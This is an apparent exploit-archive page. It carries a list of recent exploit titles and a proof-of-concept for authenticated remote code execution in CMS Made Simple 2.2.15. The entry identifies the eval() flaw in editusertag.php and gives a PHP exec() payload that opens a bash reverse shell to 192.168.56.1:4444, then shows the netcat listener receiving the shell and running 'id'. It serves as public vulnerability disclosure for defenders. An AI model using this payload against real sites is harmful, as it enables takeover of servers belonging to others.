8e0113decc
12 changes to exploits/shellcodes Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path Knockpy 4.1.1 - CSV Injection Wordpress Core 5.2.2 - 'post previews' XSS 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting Mantis Bug Tracker 2.24.3 - 'access' SQL Injection Advanced Comment System 1.0 - 'ACS_path' Path Traversal sar2html 3.2.1 - 'plot' Remote Code Execution CMS Made Simple 2.2.15 - RCE (Authenticated) Subrion CMS 4.2.1 - 'avatar[path]' XSS Click2Magic 1.1.5 - Stored Cross-Site Scripting Arteco Web Client DVR/NVR - 'SessionId' Brute Force
30 lines
No EOL
1.1 KiB
Text
30 lines
No EOL
1.1 KiB
Text
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
|
|
# Author: Andrey Stoykov
|
|
# Vendor Homepage: https://www.cmsmadesimple.org/
|
|
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
|
|
# Version: 2.2.15
|
|
# Tested on: Debian 10 LAMPP
|
|
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html
|
|
|
|
Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.
|
|
|
|
// Vulnerable eval() code
|
|
|
|
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {
|
|
|
|
Reproduction Steps:
|
|
|
|
1. Login as administrator user and navigate to Extensions->User Defined Tags
|
|
|
|
2. Add code with the payload of:
|
|
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");
|
|
|
|
3. Click on the newly created User Defined Tag and use the Run function
|
|
|
|
RCE will be achieved:
|
|
|
|
astoykov@Lubuntu:~$ nc -kvlp 4444
|
|
nc: getnameinfo: Temporary failure in name resolution
|
|
Connection received on 192.168.56.132 53690
|
|
id
|
|
uid=1(daemon) gid=1(daemon) groups=1(daemon) |